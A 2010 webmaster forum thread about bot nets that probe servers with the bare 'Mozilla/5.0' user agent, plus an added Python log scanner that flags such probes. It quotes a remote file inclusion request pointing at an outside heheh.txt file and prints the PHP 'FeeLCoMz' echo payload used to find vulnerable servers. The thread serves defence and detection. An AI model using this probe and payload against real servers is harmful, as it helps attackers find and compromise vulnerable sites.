Help identify attack tool with user agent: "Mozilla/5.0"

Server exploit attacks from APNIC use this user agent


Wizcrafts

3:52 pm on Feb 27, 2010 (gmt 0)

10+ Year Member



I am trying to get some details about a thorn in my server-side ;-)

For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"

There must be a hacktool with that default UA, but I cannot find any details about it.

Evidence (from Korean IP space):

218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"

Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.

Thanks in advance; Wiz

[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]

incrediBILL

4:02 pm on Feb 27, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



That's just a standard bot net attempting to upload a file to your server.

I get about 50+ of those every day for years now.

blend27

7:35 pm on Feb 27, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Wizcrafts, I see those on an hourly basis as well. Ask yourself a question: Do I have any files on the server that end with ".txt"? That is all there is to it.

added: besides robots.txt

Wizcrafts

7:47 pm on Feb 27, 2010 (gmt 0)

10+ Year Member



Guys,
I am already blocking all such exploit attacks. I was only asking if anybody knows what the actual hack tool might be, which has a default user agent of "Mozilla/5.0". I am trying to identify the tool, not the attack vector.

incrediBILL

8:16 pm on Feb 27, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Do I have any files on the server that end with ".txt"? That is all to it.


That's not it at all.

The file "http://example.com/columbus/heheh.txt" is a ping script residing on a compromised server they are attempting to upload into your server.

This is an active bot net running a live test for servers that respond.

The file heheh.txt looks like this:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>


If your server echoes that text then they flag your server for a return trip by the hacker.

I was only asking if anybody knows what the actual hack tool might be


It's just a standard bot net script, tons of them, many variations, no specific tool.
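
A defender-side check for probes of the kind quoted above, as an added example that is not from this thread: it parses Apache combined log lines, flags query keys that try to set a PHP superglobal to a remote URL, notes the bare Mozilla/5.0 or Mozilla/4.0 agent, and escalates any such request that was served with a 200 so the response body can be checked for the FeeLCoMz marker. The sample log lines are constructed (the 192.0.2.x, 198.51.100.x and 203.0.113.x addresses are documentation ranges, not real attackers).

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log layout, matching the request quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Query keys that try to overwrite a PHP superglobal (register_globals era).
SUPERGLOBAL_KEY = re.compile(r'^_(SERVER|GET|POST|REQUEST|COOKIE|ENV|SESSION)\[', re.I)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)
BARE_UAS = {"Mozilla/5.0", "Mozilla/4.0"}  # the bare agents the thread discusses

def classify(line):
    """Return the reasons a log line looks like an RFI probe ([] means clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    query = m["target"].partition("?")[2]  # urlsplit would read a '//' path as a host
    for key, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_KEY.match(key):
            reasons.append(f"superglobal injection via {key}")
        if REMOTE_URL.match(value):
            reasons.append(f"remote include URL in {key}")
    rfi = bool(reasons)
    if m["ua"] in BARE_UAS:
        reasons.append("bare user agent " + m["ua"])
    if rfi and m["status"] == "200":
        # A 403 means a rule fired; a 200 means the body must be checked for the
        # FeeLCoMz marker, which is what tells the bot net the include worked.
        reasons.append("served 200: inspect response for FeeLCoMz")
    return reasons

def scan(lines):
    """Map each client IP to the reasons its requests were flagged."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if reasons := classify(line):
            hits.setdefault(m["ip"] if m else "?", []).extend(reasons)
    return hits

# Constructed sample log (placeholder IPs): the probe from the thread, a benign
# request, and a hypothetical probe that was served with a 200.
SAMPLE_LOG = [
    '218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [26/Feb/2010:23:01:02 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko Firefox/3.6"',
    '198.51.100.7 - - [26/Feb/2010:23:02:45 -0700] "GET /page.php?_REQUEST[cfg]=http://203.0.113.5/x.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LOG)` returns only the two probing IPs, with the 200-served probe carrying the extra "inspect response" reason.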

Wizcrafts

8:47 pm on Feb 27, 2010 (gmt 0)

10+ Year Member



Thanks for the explanation Bill.

dstiles

9:00 pm on Feb 27, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Thanks for the explanation of the txt? files, Bill. Always wondered what they expected to find. :)

My experience, Wizcrafts, is that a simple Mozilla/4.0 or Mozilla/5.0 on its own is usually from the Chinese block, though I have seen a few from the Eastern European countries. They aren't always loaded for .txt? or php files and I've wondered if they may be an Oriental MSIE work-alike, but it's worth blocking them.

blend27

1:01 am on Feb 28, 2010 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Bill, you are absolutely right about botnets. What I mean is that any request my sites are asked to serve with a .txt extension is an instant candidate for "Naturally Delicious Dried Mangoes". 403 Calories per serving to start with... due to the fact.